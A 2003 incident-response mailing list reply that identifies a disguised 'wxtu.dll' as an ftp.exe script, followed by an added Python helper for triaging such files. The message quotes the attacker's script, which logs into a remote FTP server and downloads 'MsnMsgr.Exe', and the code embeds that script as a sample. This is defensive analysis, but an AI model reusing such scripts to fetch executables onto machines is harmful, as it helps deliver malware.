Re: New Worm or Worm Variant?

From: Joris De Donder (joris_at_digitaldefense.be)
Date: 12/11/03

  • Next message: Harlan Carvey: "Re: Strange services.exe file"
    Date: Thu, 11 Dec 2003 15:22:07 +0100
    To: incidents@securityfocus.com
    
    

    >2) Any theories on wxtu.dll? Since I can't get a hold of the malware to analyze it, I'm really guessing at this
    >point.

    It is just a text file containing:
      open 211.26.130.118
      USER noxe
      noxe
      binary
      get MsnMsgr.Exe
      bye

    >it appears to be using something like FTPCOM to do a
    >non-interactive FTP session

    Your attacker (or his script) tries to use the ftp.exe that ships with
    Microsoft Windows to retrieve MsnMsgr.Exe from an FTP server running
    at 211.26.130.118 (in your first capture).

    Joris
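
An added example, not part of the original message: a Python triage helper that recognises a file such as wxtu.dll as an ftp.exe command script despite its extension and extracts the server, account and requested files. The function names are hypothetical, and the handling of the line after `USER` as a password prompt answer is an assumption about how the script was run.

```python
import re

# Commands of the Windows ftp.exe client that are relevant for triage.
FTP_VERBS = {"open", "user", "binary", "ascii", "get", "mget", "put",
             "mput", "cd", "lcd", "bye", "quit"}
CODE_EXT = re.compile(r"\.(dll|exe|sys|ocx)$", re.I)

def parse_ftp_script(data: bytes):
    """Summarise data if it reads as an ftp.exe command script, else None."""
    if b"\x00" in data or len(data) > 4096:
        return None  # compiled code contains NUL bytes; scripts are short text
    lines = [l.strip() for l in data.decode("ascii", "replace").splitlines()]
    lines = [l for l in lines if l]
    info = {"host": None, "user": None, "downloads": [], "unknown": []}
    expect_password = False
    for line in lines:
        if expect_password:
            # Assumption: "user <name>" without a password makes the client
            # prompt, and the next script line answers that prompt.
            expect_password = False
            continue
        verb, *args = line.split()
        verb = verb.lower()
        if verb == "open" and args:
            info["host"] = args[0]
        elif verb == "user" and args:
            info["user"] = args[0]
            expect_password = len(args) < 2
        elif verb == "get" and args:
            info["downloads"].append(args[0])   # get <remote> [local]
        elif verb == "mget":
            info["downloads"].extend(args)
        elif verb not in FTP_VERBS:
            info["unknown"].append(line)
    if info["host"] is None or len(info["unknown"]) > len(lines) // 2:
        return None
    return info

def triage(filename: str, data: bytes):
    """Return the script summary, flagging a code extension on text content."""
    info = parse_ftp_script(data)
    if info is not None:
        info["disguised"] = bool(CODE_EXT.search(filename))
    return info

# Constructed sample: the script text quoted in the message above.
SAMPLE = (b"open 211.26.130.118\r\nUSER noxe\r\nnoxe\r\nbinary\r\n"
          b"get MsnMsgr.Exe\r\nbye\r\n")

if __name__ == "__main__":
    print(triage("wxtu.dll", SAMPLE))
```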
